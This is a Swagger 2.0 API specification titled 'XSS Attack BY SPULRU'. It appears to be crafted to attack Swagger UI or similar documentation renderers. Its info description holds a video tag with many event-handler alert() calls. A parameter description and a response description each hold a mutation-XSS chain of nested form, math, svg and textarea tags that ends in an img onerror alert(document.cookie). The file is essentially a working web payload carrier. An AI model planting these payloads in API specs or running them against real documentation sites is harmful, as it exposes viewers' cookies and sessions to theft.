swagger: '2.0'
info:
  title: XSS Attack BY SPULRU
  description: </p><video autoplay=1 @error=alert() onloadedmetadata=alert(1) onloadeddata=alert(2) onplay=alert(3) onplaying=alert(4) onprogress=alert(5)> <source src="https://www.youtube.com/watch?v=N3MqFK63tRo" type="video/webm"></video><p>
    
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /SPULRU:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - SPULRU_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
            
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
